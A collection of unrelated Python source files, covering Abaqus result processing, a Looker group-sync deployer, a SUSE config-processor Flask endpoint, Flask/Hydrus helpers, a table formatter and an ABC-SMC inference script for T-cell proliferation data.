self.steps[n].add_increment(inc_n, time_inc, step_time, load_prop)
def get_nodal_result(self, var, step, inc, node_set=None, elem_set=None, node_ids=None):
"""Get nodal results
Parameters
----------
var : str
Output variable
step : int
Number of the Abaqus step.
inc : int
Number of the increment.
node_set : str, list
elem_set : str, list
Returns
-------
TODO
"""
# Get the keys of the nodes in the set of nodes
if node_set is not None:
keys = sorted(self.get_nodes_from_set(node_set))
elem_ids = self.get_elems_from_nodes(keys)
# Get elements belonging to the set
elif elem_set is not None:
elem_ids = self.get_elems_from_set(elem_set)
keys = sorted(self.get_nodes_from_elems(elem_ids))
elif node_ids is not None:
elem_ids = self.get_elems_from_nodes(node_ids)
keys = sorted(node_ids)
else:
# FIXME: have this variable sorted globally
keys = sorted(list(self.nodes.keys()))
try:
elem_ids = self.elem_output[step][inc][var].keys()
except KeyError:
print(f"Requested output variable {var} not present as element result of the model.")
if var in self.nodal_output[step][inc]:
results = self.nodal_output[step][inc][var]
elif var in self.elem_output[step][inc]:
results = self._nodal_result_from_elements(var, step, inc, elem_ids)
else:
# FIXME: handle errors properly some day
print("Variable not present")
list_res = [results[k] for k in keys]
return np.array(list_res)
def _nodal_result_from_elements(self, var, step, inc, elem_ids):
"""Get nodal results from element results by extrapolating.
Shape functions are used to extrapolate to the nodes.
Parameters
----------
var : str
Result variable.
step : int
Step
inc : int
Increment
Returns
-------
array
"""
keys_out = elem_ids
output = self.elem_output[step][inc][var]
elements = self.elements
# FIXME: there are some hacky things here. Try to fix that
nodes = self.nodes
res_nodes = np.zeros(len(nodes) + 1)
counter = np.zeros(len(nodes) + 1)
for ix in keys_out:
var_i = output[ix]
# Returns extrapolated variables and respective node labels
nodal_i, elem_nodes = elements[ix].extrapolate_to_nodes(var_i)
res_nodes[elem_nodes] += nodal_i.flatten()
counter[elem_nodes] += 1
# FIXME: Another hacky fix
counter[counter == 0] = np.nan
result = res_nodes / counter
# FIXME: output correct size
return result
def get_time_history_result_from_node(self, var, node_id, steps="all"):
"""Get results for a node duiring the whole simulation.
Parameters
----------
var : TODO
node_id : TODO
steps : str, list, int
The steps used to retrieve the results. Default: 'all'
Returns
-------
np.array :
Results for the given variable `var`
"""
steps = self.steps.keys()
# The first step is always zero (FIXME: maybe not always if there are
# prestresses.)
result = [0]
for step in steps:
for inc, val in self.nodal_output[step].items():
result += [val[var][node_id]]
return np.array(result)
def get_nodal_vector_result(self, var, step, inc, node_set=None, elem_set=None):
"""Get the vector of a variable at each node.
Parameters
----------
var : str
Output variable
step : int
Number of the Abaqus step.
inc : int
Number of the increment.
node_set : str, list
elem_set : str, list
Returns
-------
array :
Nx3 array of displacements in each node
"""
coords = list()
# Get the keys of the nodes in the set of nodes
if node_set is not None:
keys = sorted(self.get_nodes_from_set(node_set))
# Get elements belonging to the set
elif elem_set is not None:
elem_ids = self.get_elems_from_set(elem_set)
keys = sorted(self.get_nodes_from_elems(elem_ids))
else:
nodes = self.nodes
keys = sorted(list(self.nodes.keys()))
for k in keys:
coords.append(self._get_node_vector_result(k, var, step, inc))
coords_ar = np.array(coords)
return coords_ar
def get_element_result(self, var, step, inc, elem_set=None, elem_id=None):
"""Get element results.
Parameters
----------
var : TODO
step : TODO
inc : TODO
Returns
-------
TODO
"""
# FIXME: have this variable sorted globally
keys = sorted(list(self.elements.keys()))
# Elements for which the output variable exists
keys_out = set(self.elem_output[step][inc][var].keys())
if self._status is not None:
status = self.elem_output[step][inc][f"SDV{self._status}"]
del_elem = [k for k, v in status.items() if v[0] == 0]
keys_out = [k for k in keys_out if k not in del_elem]
keys = [k for k in keys if k not in del_elem]
if elem_set is not None:
set_elements = self.get_elems_from_set(elem_set)
def filter_elements(elem):
if elem in set_elements:
return True
else:
return False
keys_out = filter(filter_elements, keys_out)
keys = filter(filter_elements, keys)
elif elem_id is not None:
set_elements = set(elem_id)
def filter_elements(elem):
if elem in set_elements:
return True
else:
return False
keys_out = set(elem_id)
keys = elem_id
results = self.elem_output[step][inc][var]
list_res = [np.mean(results[k]) if k in keys_out else np.nan for k in keys]
ar_results = np.array(list_res)
return ar_results
def get_surface_result(self, var, step, inc, surf_name):
"""Get element result on a given surface.
Parameters
----------
var : str
Output variable.
step : int
Simulation step.
inc : int
Increment within the step.
surface : str
Name of the surface.
Returns
-------
TODO
"""
# Get underlying element numbers
surf = self.surfaces[surf_name]
e_nums = [face._element.num for face in surf._faces]
# Retrieve element output
out = self.get_element_result(var, step, inc, elem_id=e_nums)
return out
def add_metadata(self, metadata):
"""Add metadata to the model."""
self.metadata[metadata[0]] = metadata[1]
def get_node_coords(self, node_set=None, elem_set=None, node_id=None, return_map=False):
"""Get a list with the node coordinates.
Return
------
coords : array
An array of size (n, 3), where n is the number of nodes
kmap : dict
If either `node_set`, `elem_set` or `node_id` are given and `return_map` is
True, then a dictionary is returned mapping the new node ids to the original
node ids.
"""
nodes = self.nodes
if node_set is not None:
old_keys = sorted(self.get_nodes_from_set(node_set))
keys = np.arange(1, len(old_keys) + 1, 1)
# Map new indices to old indices
kmap = {k: ix for k, ix in zip(keys, old_keys)}
elif node_id is not None:
old_keys = sorted([node_id])
keys = np.arange(1, len(old_keys) + 1, 1)
# Map new indices to old indices
kmap = {k: ix for k, ix in zip(keys, old_keys)}
elif elem_set is not None:
elems = self.get_elems_from_set(elem_set)
old_keys = sorted(self.get_nodes_from_elems(elems))
keys = np.arange(1, len(old_keys) + 1, 1)
# Map new indices to old indices
kmap = {k: ix for k, ix in zip(keys, old_keys)}
else:
keys = sorted(list(nodes.keys()))
kmap = {k: k for k in keys}
coords = np.empty((len(keys), 3))
for k in keys:
coords[k - 1, :] = nodes[kmap[k]].coords
coords_ar = np.array(coords)
if return_map:
return coords_ar, kmap
else:
return coords_ar
def get_deformed_node_coords(self, step, inc, scale=1, node_id=None, node_set=None,
elem_set=None):
"""Get deformed node coordinates.
Parameters
----------
step : int
Step to get deformations from
inc : int
Index of the increment in the required step.
scale : float
Multiply the deformations by this number.
node_set : str, list
elem_set : str, list
Returns
-------
array :
2D-Array with the node coordinates
"""
coords, kmap = self.get_node_coords(node_id=node_id, node_set=node_set,
elem_set=elem_set, return_map=True)
for k in range(1, np.shape(coords)[0] + 1, 1):
coords[k - 1, :] += self._get_node_vector_result(kmap[k], "U", step, inc) * scale
return coords
def get_cells(self, elem_set=None, status=None):
"""Get the definition of cells for all elements.
The format is the one required by VTK.
Returns
-------
cells : array
Cells of each elements
offset : array
Offset for each element
elem_type : array
Array with element types
"""
elements = self.elements
# Element deletion is considered here
if status is not None:
def is_del(n_ele):
if n_ele in status.keys():
if status[n_ele][0] != 0:
return True
else:
return False
else:
return True
# Don't consider the deleted elements for mesh
elements = {k: v for k, v in elements.items() if is_del(k)}
if elem_set is not None:
elem_ids = self.get_elems_from_set(elem_set)
nodes = self.get_nodes_from_elems(elem_ids)
new_node_ids = np.arange(1, len(nodes) + 1, 1)
kmap = {k: ix for k, ix in zip(nodes, new_node_ids)}
elements = {k: elements[k] for k in elem_ids}
else:
kmap = None
keys = sorted(list(elements.keys()))
cells = list()
offset = list()
elem_type = list()
for el_i in keys:
cells.extend(elements[el_i].get_cell(kmap=kmap))
offset.append(len(elements[el_i]._nodes))
elem_type.append(elements[el_i]._elem_type)
ar_cells = np.array(cells)
ar_offset = np.cumsum(np.array(offset, dtype=int)) - offset[0]
ar_elem_type = np.array(elem_type, np.int8)
return ar_cells, ar_offset, ar_elem_type
def get_mesh(self, elem_set=None):
"""Construct the mesh of the finite element model
Returns
-------
mesh : mesh
VTK mesh unstructured grid
"""
nodes = self.get_node_coords(elem_set=elem_set)
cells, offset, elem_t = self.get_cells(elem_set)
mesh = UnstructuredGrid(offset, cells, elem_t, nodes)
self.mesh = mesh
return self.mesh
def get_surface(self, name, return_nodes=False, step=None, inc=None, scale=1):
"""Get mesh of surface.
Parameters
----------
name : TODO
Returns
-------
mesh :
Mesh representation of the surface.
"""
surface = self.surfaces[name]
if return_nodes:
return surface.mesh, surface.get_used_nodes().keys()
else:
return surface.mesh
def get_deformed_mesh(self, step, inc, scale=1, elem_set=None):
"""Construct the deformed mesh in step with scaled deformations.
Parameters
----------
step : int
Index of the needed step
inc : int
Index of the increment within the step
scale : flotat
Scale to be applied to the deformations
status : int, None
Solution-dependent state variable that controls the element deletion
Returns
-------
mesh : mesh
VTK mesh unstructured grid
"""
nodes = self.get_deformed_node_coords(step, inc, scale, elem_set=elem_set)
if self._status:
status = self.elem_output[step][inc][f"SDV{self._status}"]
else:
status = None
cells, offset, elem_t = self.get_cells(elem_set=elem_set, status=status)
mesh = UnstructuredGrid(offset, cells, elem_t, nodes)
self.mesh = mesh
return self.mesh
def _get_node_vector_result(self, n, var, step, inc):
"""Get the displacement vector of the node `n`
Parameters
----------
n : int
The index of the node.
step : int
The step for which the displacement is required.
inc : int
The increment within the required step.
Returns
-------
array :
An array with the displacements of the node
"""
nodal_output = self.nodal_output[step][inc]
if self._dimension == 3:
u = np.array([
nodal_output[f"{var}1"][n],
nodal_output[f"{var}2"][n],
nodal_output[f"{var}3"][n],
])
else:
u = np.array([
nodal_output[f"{var}1"][n],
nodal_output[f"{var}2"][n],
0,
])
return u
def post_import_actions(self):
"""Execute some functions after importing all the records into the model."""
pass
def get_elems_from_set(self, elem_set):
"""Get the element IDs belonging to an elemnt set.
Parameters
----------
elem_set : str, list
Name of the set or list with names of different sets.
Returns
-------
list :
List containing the element IDs present in the set(s).
"""
if isinstance(elem_set, str):
elem_ids = self.element_sets[elem_set]
# Is list
else:
elem_ids = []
for set_i in elem_set:
elem_ids += self.element_sets[set_i]
return set(elem_ids)
def get_nodes_from_elems(self, elems):
"""Get nodal IDs from a list of element IDs.
Parameters
----------
elems : list
Returns
-------
TODO
"""
elements = self.elements
# Initialize list to store all the nodes
nodes = list()
for el in elems:
nodes += elements[el]._nodes
# Remove duplicates
nodes_ar = np.array(nodes, dtype=np.int)
return np.unique(nodes_ar)
def get_nodes_from_set(self, node_set):
"""Get node IDs belonging to the node set.
Parameters
----------
node_set : str, list
Returns
-------
TODO
"""
if isinstance(node_set, str):
node_ids = self.node_sets[node_set]
# Is list
else:
node_ids = []
for set_i in node_set:
node_ids += self.node_sets[set_i]
return node_ids
def get_elems_from_nodes(self, node_ids):
"""Get element IDs from a set of nodes.
Parameters
----------
node_ids : list
Returns
-------
TODO
"""
nodes = self.nodes
elem_ids = list()
for ni in node_ids:
elem_ids += nodes[ni].in_elements
# Remove duplicates
elems_ar = np.array(elem_ids, dtype=np.int)
return np.unique(elems_ar)
def __repr__(self):
n_out = list(self.nodal_output[1][1].keys())
e_out = list(self.elem_output[1][1].keys())
s = f"""Abaqus result object:
--------------------
Number of nodes: {len(self.nodes):,}
Number of elements: {len(self.elements):,}
Number of node sets: {len(self.node_sets):,}
Number of element sets: {len(self.element_sets):,}
Nodal output variables: {n_out}
Element output variables: {e_out}
"""
return s
|
class DefaultProcedure:
def __init__(self):
return 0
def simulate(self):
return 0
def setup(self):
return 0
def initialize(self):
return 0
|
import logging
import re
from looker_sdk import models
from looker_deployer.utils import deploy_logging
from looker_deployer.utils.get_client import get_client
from looker_deployer.utils.match_by_key import match_by_key
logger = deploy_logging.get_logger(__name__)
def get_filtered_groups(source_sdk, pattern=None):
groups = source_sdk.all_groups()
logger.debug(
"Groups pulled",
extra={
"groups_name": [i.name for i in groups]
}
)
groups = [i for i in groups if not i.externally_managed]
if pattern:
compiled_pattern = re.compile(pattern)
groups = [i for i in groups if compiled_pattern.search(i.name)]
logger.debug(
"Groups in Group filtered",
extra={
"filtered_groups": [i.name for i in groups],
"pattern": pattern
}
)
return groups
def write_groups_in_group(source_sdk, target_sdk, pattern=None): # noqa: C901
# INFO: Get all groups from source and target instances that match pattern
# for name
groups = get_filtered_groups(source_sdk, pattern)
target_groups = get_filtered_groups(target_sdk, pattern=None)
# INFO: Start Loop of Create/Update on Target
for group in groups:
matched_group = match_by_key(target_groups, group, "name")
logger.debug("Group Matched " + matched_group.name)
groups_in_group = source_sdk.all_group_groups(group.id)
target_groups_in_group = target_sdk.all_group_groups(matched_group.id)
# INFO: Need to loop through the groups in group to identify
# target group ID
for i, nested_group in enumerate(groups_in_group):
target_nested_group = match_by_key(target_groups, nested_group,
"name")
if target_nested_group:
nested_group.id = target_nested_group.id
groups_in_group[i] = nested_group
else:
groups_in_group.remove(nested_group)
# INFO: If groups in groups between instances is different, we need to
# either delete or create
source_group_ids = []
for nested_group in groups_in_group:
source_group_ids.append(nested_group.id)
target_group_ids = []
for nested_group in target_groups_in_group:
target_group_ids.append(nested_group.id)
all_group_ids = list(set().union(source_group_ids, target_group_ids))
for group_id in all_group_ids:
in_source = True
in_target = True
try:
source_group_ids.index(group_id)
except Exception:
in_source = False
try:
target_group_ids.index(group_id)
except Exception:
in_target = False
if in_source and not in_target:
logger.debug("No Groups in Group found. Creating...")
logger.debug("Deploying Groups in Group",
extra={"group_name": group.name,
"group_group_id": group_id})
target_sdk.add_group_group(group_id=matched_group.id,
body=models.GroupIdForGroupInclusion
(group_id=group_id))
logger.info("Deployment Complete",
extra={"group_name": group.name,
"group_group_id": group_id})
elif not in_source and in_target:
logger.debug("Extra Groups in Group found. Deleting...")
logger.debug("Removing Groups in Group",
extra={"group_name": group.name,
"group_group_id": group_id})
target_sdk.delete_group_from_group(group_id=matched_group.id,
deleting_group_id=group_id)
logger.info("Deployment Complete",
extra={"group_name": group.name,
"group_group_id": group_id})
def main(args):
if args.debug:
logger.setLevel(logging.DEBUG)
source_sdk = get_client(args.ini, args.source)
for t in args.target:
target_sdk = get_client(args.ini, t)
write_groups_in_group(source_sdk, target_sdk, args.pattern)
|
# (c) Copyright 2017-2018 SUSE LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import abort
from flask import Blueprint
from flask import jsonify
from flask import make_response
from flask import request
import os
from oslo_config import cfg
from oslo_log import log as logging
import subprocess
import sys
import tempfile
import time
from . import model
from . import playbooks
from . import policy
LOG = logging.getLogger(__name__)
bp = Blueprint('config_processor', __name__)
CONF = cfg.CONF
@bp.route("/api/v2/config_processor", methods=['POST'])
@policy.enforce('lifecycle:run_config_processor')
def run_config_processor():
"""Validate the current input model
No body is required
This will run the configuration processor directly, not the playbook. This
is a synchronous call which takes up to about 20 seconds. The HTTP response
will be sent once the config processor has finished. If the model was
deemed valid, the response will have a status code of 200 and the body will
be the output of the config processor (Note: this is in fact the expanded
input model and is quite large). If the model was invalid, the status code
will be 400 and the body of the response will be contain the log of the
Config Processor explaining why things failed.
.. :quickref: Config Processor; Validate the current input model
**Example valid response**:
.. sourcecode:: http
HTTP/1.1 201 CREATED
**Example invalid response**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
Content-Type: application/json
{
"errorCode": 254,
"log": "Processing cloud model version 2.0#### ...."
"startTime": 1457710327543,
"endTime": 1457710330491,
}
"""
# TODO(gary): Remove this and modify the UI to avoid calling the back end
req = request.json
if req and "want_fail" in req:
error = {"log": "woops", "errorCode": 254}
abort(make_response(jsonify(error), 400))
elif req and "want_pass" in req:
return '', 201
python = CONF.paths.cp_python_path or sys.executable
tempdir = tempfile.mkdtemp()
output_dir = os.path.join(tempdir, "clouds")
log_dir = os.path.join(tempdir, "log")
cmd = playbooks.build_command_line(python, CONF.paths.cp_script_path, [
'-l', log_dir,
'-c', os.path.join(CONF.paths.model_dir, 'cloudConfig.yml'),
'-s', CONF.paths.cp_services_dir,
'-r', CONF.paths.cp_schema_dir,
'-o', output_dir])
start_time = int(time.time())
try:
subprocess.check_output(cmd, stderr=subprocess.STDOUT,
universal_newlines=True)
except Exception as e:
# Cannot get except subprocess.CalledProcessError to be caught, so
# catch Exception
LOG.exception(e)
error = {
'startTime': start_time,
'endTime': int(time.time())
}
if hasattr(e, 'output'):
error['log'] = e.output
if hasattr(e, 'returncode'):
error['errorCode'] = e.returncode
abort(make_response(jsonify(error), 400))
input_model = model.read_model()
cloud_name = input_model['inputModel']['cloud']['name']
generated = os.path.join(output_dir, cloud_name, '2.0', 'stage', 'info')
if os.path.exists(generated):
return '', 201
msg = 'Unable to locate config processor output'
error_file = os.path.join(log_dir, "errors.log")
if os.path.exists(error_file):
try:
with open(error_file) as f:
lines = f.readlines()
msg = ''.join(lines)
except IOError:
pass
error = {
'startTime': start_time,
'endTime': int(time.time()),
'log': msg,
'errorCode': 127
}
abort(make_response(jsonify(error), 400))
|
from typing import TYPE_CHECKING, List, Optional
from .formatter import Formatter
if TYPE_CHECKING:
from sharptable.tables import Table
class CompositeFormatter(Formatter):
"""
Class allowing for multiple formatters to be applied.
"""
def __init__(self, formatters: Optional[List[Formatter]] = None):
"""
Args:
formatters: Optional list of formatters to apply.
"""
self._formatters: List[Formatter] = []
if formatters is not None:
self._formatters = formatters
def add(self, formatter: Formatter) -> None:
"""
Add new formatter to list of formatters.
Args:
formatter: Formatter to add to list of formatters.
"""
self._formatters.append(formatter)
def apply(self, table: "Table") -> None:
"""
Apply transform to sharptable.
Args:
table: Table that formatter is applied to.
"""
for formatter in self._formatters:
formatter.apply(table)
|
"""Pluggable utilities for Hydrus."""
from contextlib import contextmanager
from flask import appcontext_pushed
from flask import g
from hydrus.hydraspec import doc_writer_sample
from hydrus.data.db_models import engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.session import Session
from hydrus.hydraspec.doc_writer import HydraDoc
@contextmanager
def set_session(application, DB_SESSION):
"""Set the database session for the app. Must be of type <hydrus.hydraspec.doc_writer.HydraDoc>."""
if not isinstance(DB_SESSION, Session):
raise TypeError("The API Doc is not of type <sqlalchemy.orm.session.Session>")
def handler(sender, **kwargs):
g.dbsession = DB_SESSION
with appcontext_pushed.connected_to(handler, application):
yield
@contextmanager
def set_hydrus_server_url(application, server_url):
"""Set the server URL for the app. Must be of type <str>."""
if not isinstance(server_url, str):
raise TypeError("The server_url is not of type <str>")
def handler(sender, **kwargs):
g.hydrus_server_url = server_url
with appcontext_pushed.connected_to(handler, application):
yield
@contextmanager
def set_api_name(application, api_name):
"""Set the server name or EntryPoint for the app. Must be of type <str>."""
if not isinstance(api_name, str):
raise TypeError("The api_name is not of type <str>")
def handler(sender, **kwargs):
g.api_name = api_name
with appcontext_pushed.connected_to(handler, application):
yield
@contextmanager
def set_doc(application, APIDOC):
"""Set the API Documentation for the app. Must be of type <hydrus.hydraspec.doc_writer.HydraDoc>."""
if not isinstance(APIDOC, HydraDoc):
raise TypeError("The API Doc is not of type <hydrus.hydraspec.doc_writer.HydraDoc>")
def handler(sender, **kwargs):
g.doc = APIDOC
with appcontext_pushed.connected_to(handler, application):
yield
@contextmanager
def set_authentication(application, authentication):
"""Set the wether API needs to be authenticated or not."""
if not isinstance(authentication, bool):
raise TypeError("Authentication flag must be of type <bool>")
def handler(sender, **kwargs):
g.authentication_ = authentication
with appcontext_pushed.connected_to(handler, application):
yield
def get_doc():
"""Get the server API Documentation."""
apidoc = getattr(g, 'doc', None)
if apidoc is None:
apidoc = doc_writer_sample.api_doc
g.doc = apidoc
return apidoc
def get_authentication():
"""Check wether API needs to be authenticated or not."""
authentication = getattr(g, 'authentication_', None)
if authentication is None:
authentication = False
g.authentication_ = authentication
return authentication
def get_api_name():
"""Get the server API name."""
api_name = getattr(g, 'api_name', None)
if api_name is None:
api_name = "api"
g.doc = api_name
return api_name
def get_hydrus_server_url():
"""Get the server URL."""
hydrus_server_url = getattr(g, 'hydrus_server_url', None)
if hydrus_server_url is None:
hydrus_server_url = "http://localhost/"
g.hydrus_server_url = hydrus_server_url
return hydrus_server_url
def get_session():
"""Get the Database Session for the server."""
session = getattr(g, 'dbsession', None)
if session is None:
session = sessionmaker(bind=engine)()
g.dbsession = session
return session
|
# Pyhton code to run the ABC-SMC algorithm to parametrise the multi-stage model with cell generations
# making use of F5 T cells data.
# Reference: "Approximate Bayesian Computation scheme for parameter inference and model selection
# in dynamical systems" by Toni T. et al. (2008).
# Import the required modules.
import numpy as np
from scipy.linalg import expm
G = 11 # total number of generations
dist_gen = 6 # used to define generation 5+
n_pars = 6 # number of parameters in the multi-stage model
# Reading the data.
data = np.loadtxt("data_F5.txt")
std_dev = np.loadtxt("std_dev_F5.txt")
# Define the time points (unit of hours).
t2 = np.array([72, 96, 120, 144, 168, 240, 288, 432])
# Define the multi-stage model with cell generations.
def diag(g, N, l, m):
if g < 5:
return (np.diag([-(l[g] + m[g])] * N) + np.diag([l[g]] * (N - 1), -1))
else:
return (np.diag([-(l[5] + m[5])] * N) + np.diag([l[5]] * (N - 1), -1))
def matrix(N0, N1, l, m):
M = np.zeros((N0 + (G - 1) * N1, N0 + (G - 1) * N1))
M[0:N0, 0:N0] = diag(0, N0, l, m)
for i in range(1, G):
M[N0 + (i - 1) * N1:N0 + i * N1, N0 + (i - 1) * N1:N0 + i * N1] = diag(i, N1, l, m)
M[N0, N0 - 1] = 2 * l[0]
for i in range(1, G - 1):
if i < 5:
M[N0 + i * N1, N0 + i * N1 - 1] = 2 * l[i]
else:
M[N0 + i * N1, N0 + i * N1 - 1] = 2 * l[5]
return (M)
def exp_matrix(N0, N1, inits, times, l, m):
output = np.zeros((len(times), N0 + N1 * (G - 1)))
A = matrix(N0, N1, l, m)
for i in range(len(times)):
sol = np.dot(expm(A * times[i]), inits)
output[i] = sol
return output.T
# Define the functions to use in the ABC-SMC algorithm to generate the first epsilon, to run the first iteration
# and to run all the other iterations.
# As it may be difficult to decide on a reasonably large value of epsilon to use at the first iteration,
# we defined the function below to generate it.
def generate_eps1(nn, rr):
# Empty array to store the distance.
results = np.empty((0))
# Empty array to store the accepted parameters.
params = np.empty((0, n_pars))
for run in range(nn * rr):
# Sample the parameters from uniform prior distributions.
l0, lambd = 10 ** np.random.uniform(-3, 1, 2)
l = np.array([lambd for _ in range(dist_gen)])
l[0] = l0
alpha = 10 ** np.random.uniform(-5, -1)
m = np.zeros(dist_gen)
for i in range(dist_gen):
m[i] = alpha * i
pars_int = np.array([np.random.randint(1, 50), np.random.randint(1, 50)])
C0 = 10 ** np.random.uniform(4, 6)
N0 = pars_int[0]
N1 = pars_int[1]
inits = np.zeros((N0 + (G - 1) * N1))
inits[0] = C0
# Run the model to compute the expected number of cells in each generation.
generations = [[] for _ in range(dist_gen)]
modelexp = exp_matrix(N0, N1, inits, t2, l, m)
s0 = sum(modelexp[0:N0])
generations[0].append(s0)
for i in range(1, dist_gen):
if i < 5:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + i * N1])
generations[i].append(s)
else:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + (G - 1) * N1])
generations[i].append(s)
# Compute the distance between the model predictions and the experimental data.
generationsravel = np.ravel(generations)
dataravel = np.ravel(data)
std_ravel = np.ravel(std_dev)
distance = np.sqrt(np.sum(((generationsravel - dataravel) / std_ravel) ** 2))
results = np.hstack((results, distance))
params = np.vstack((params, np.hstack((C0, l0, lambd, alpha, pars_int))))
# Compute epsilon to use at the first iteration.
epsilon = np.median(results)
return epsilon
# Define the function for the first iteration of ABC-SMC in which the parameters are sampled
# from the uniform prior distributions.
def iteration1(nn):
# Empty array to store the distance.
results = np.empty((0, 1))
# Empty array to store the accepted parameters.
params = np.empty((0, n_pars))
number = 0 # Counter for the sample size.
truns = 0 # Counter for the total number of runs.
while number < nn:
truns += 1
# Sample the parameters from uniform prior distributions.
l0, lambd = 10 ** np.random.uniform(-3, 1, 2)
l = np.array([lambd for _ in range(dist_gen)])
l[0] = l0
alpha = 10 ** np.random.uniform(-5, -1)
m = np.zeros(dist_gen)
for i in range(dist_gen):
m[i] = alpha * i
pars_int = np.array([np.random.randint(1, 50), np.random.randint(1, 50)])
C0 = 10 ** np.random.uniform(4, 6)
N0 = pars_int[0]
N1 = pars_int[1]
inits = np.zeros((N0 + (G - 1) * N1))
inits[0] = C0
pars = np.hstack((C0, l0, lambd, alpha, pars_int))
# Run the model to compute the expected number of cells in each generation.
generations = [[] for _ in range(dist_gen)]
modelexp = exp_matrix(N0, N1, inits, t2, l, m)
s0 = sum(modelexp[0:N0])
generations[0].append(s0)
for i in range(1, dist_gen):
if i < 5:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + i * N1])
generations[i].append(s)
else:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + (G - 1) * N1])
generations[i].append(s)
# Compute the distance between the model predictions and the experimental data.
generationsravel = np.ravel(generations)
dataravel = np.ravel(data)
std_ravel = np.ravel(std_dev)
distance = np.sqrt(np.sum(((generationsravel - dataravel) / std_ravel) ** 2))
# If the distance is less than epsilon, store the parameters values and increase by one the counter for
# the sample size.
if distance < eps1:
number += 1
results = np.vstack((results, distance))
params = np.vstack((params, pars))
# Compute the weight for each accepted parameter set - at iteration 1, parameter sets have equal weight.
weights = np.empty((0, 1))
for i in range(nn):
weights = np.vstack((weights, 1 / nn))
# Return the results: distance, accepted parameters, weights and total number of runs.
return [np.hstack((results, params, weights)), truns]
# Function for the other iterations of the ABC-SMC algorithm, where the parameter values are sampled
# from the posterior distributions of the previous iteration.
def other_iterations(nn, it):
# Compute uniform areas to sample within in order to perturb the parameters.
ranges = []
for i in range(n_pars - 2):
r1 = np.max(np.log10(ABC_runs[it][:, i + 1])) - np.min(np.log10(ABC_runs[it][:, i + 1]))
ranges.append(r1)
for i in range(n_pars - 2, n_pars):
r1 = np.max(ABC_runs[it][:, i + 1]) - np.min(ABC_runs[it][:, i + 1])
ranges.append(r1)
ranges_arr = np.asarray(ranges)
sigma = 0.1 * ranges_arr
sigma[n_pars - 2] = int(np.ceil(sigma[n_pars - 2]))
sigma[n_pars - 1] = int(np.ceil(sigma[n_pars - 1]))
# Define epsilon as median of the accepted distance values from previous iteration.
epsilon = np.median(ABC_runs[it][:, 0])
# To use when sampling the new parameters.
p_list = [i for i in range(nn)]
# Define upper and lower bounds of the prior distributions for each parameter in the model.
lower_bounds = np.hstack((10 ** 4, 10 ** (-3), 10 ** (-3), 10 ** (-5), 1, 1))
upper_bounds = np.hstack((10 ** 6, 10, 10, 10 ** (-1), 50, 50))
# Empty array to store the distance.
results = np.empty((0))
# Empty array to store accepted parameters.
params = np.empty((0, n_pars))
# Empty array to store the prior samples.
priors_abc = np.empty((0, n_pars))
# Empty array to store the weights.# Empty array to store the weights.
weights_arr = np.empty((0))
number = 0 # Counter for the sample size.
truns = 0 # Counter for the total number of runs.
while number < nn:
truns += 1
check = 0
# The following while loop is to sample the parameters from the posterior distributions of the previous
# iteration. Then the parameters are perturbed making use of a uniform perturbation kernel.
# If the new parameters lie within the initial prior ranges, they are used to obtaining model predictions,
# otherwise they are sampled again.
while check < 1:
# Randomly choose a parameter set from the posterior obtained from the previous iteration.
choice = np.random.choice(p_list, 1, p=ABC_runs[it][:,n_pars + 1])
prior_sample = ABC_runs[it][:, range(1, n_pars + 1)][choice]
# Generate new parameters through perturbation.
parameters = []
for i in range(n_pars - 2):
lower = np.log10(prior_sample[0, i]) - sigma[i]
upper = np.log10(prior_sample[0, i]) + sigma[i]
pars = np.random.uniform(lower, upper)
parameters.append(10 ** pars)
for i in range(n_pars - 2, n_pars):
lower = prior_sample[0, i] - sigma[i]
upper = prior_sample[0, i] + sigma[i]
pars = np.random.randint(lower, upper)
parameters.append(pars)
# Check that the new parameters lie within the initial prior ranges.
check_out = 0
for ik in range(n_pars):
if parameters[ik] < lower_bounds[ik] or parameters[ik] > upper_bounds[ik]:
check_out = 1
if check_out == 0:
check += 1
C0 = float(parameters[0])
l0, lambd = parameters[1:3]
l = np.array([lambd for _ in range(dist_gen)])
l[0] = l0
m = np.zeros(dist_gen)
for i in range(dist_gen):
m[i] = i * parameters[3]
N0 = int(parameters[n_pars - 2])
N1 = int(parameters[n_pars - 1])
inits = np.zeros((N0 + (G - 1) * N1))
inits[0] = C0
# Run the model to compute the expected number of cells in each generation.
generations = [[] for _ in range(dist_gen)]
modelexp = exp_matrix(N0, N1, inits, t2, l, m)
s0 = sum(modelexp[0:N0])
generations[0].append(s0)
for i in range(1, dist_gen):
if i < 5:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + i * N1])
generations[i].append(s)
else:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + (G - 1) * N1])
generations[i].append(s)
# Compute the distance between the model predictions and the experimental data.
generationsravel = np.ravel(generations)
dataravel = np.ravel(data)
std_ravel = np.ravel(std_dev)
distance = np.sqrt(np.sum(((generationsravel - dataravel) / std_ravel) ** 2))
# If the distance is less than epsilon, store the parameters values and increase by one the counter for
# the sample size.
if distance < epsilon:
number += 1
# Compute the weights for the accepted parameter set.
denom_arr = []
for j in range(nn):
weight = ABC_runs[it][j, n_pars + 1]
params_row = ABC_runs[it][j, 1:n_pars + 1]
boxs_up = []
boxs_low = []
for i in range(n_pars - 2):
boxs_up.append(np.log10(params_row[i]) + sigma[i])
boxs_low.append(np.log10(params_row[i]) - sigma[i])
for i in range(n_pars - 2, n_pars):
boxs_up.append(params_row[i] + sigma[i])
boxs_low.append(params_row[i] - sigma[i])
outside = 0
for i in range(n_pars - 2):
if np.log10(parameters[i]) < boxs_low[i] or np.log10(parameters[i]) > boxs_up[i]:
outside = 1
for i in range(n_pars - 2, n_pars):
if parameters[i] < boxs_low[i] or parameters[i] > boxs_up[i]:
outside = 1
if outside == 1:
denom_arr.append(0)
else:
denom_arr.append(weight * np.prod(1 / (2 * sigma)))
weight_param = 1 / np.sum(denom_arr)
weights_arr = np.hstack((weights_arr, weight_param))
results = np.hstack((results, distance))
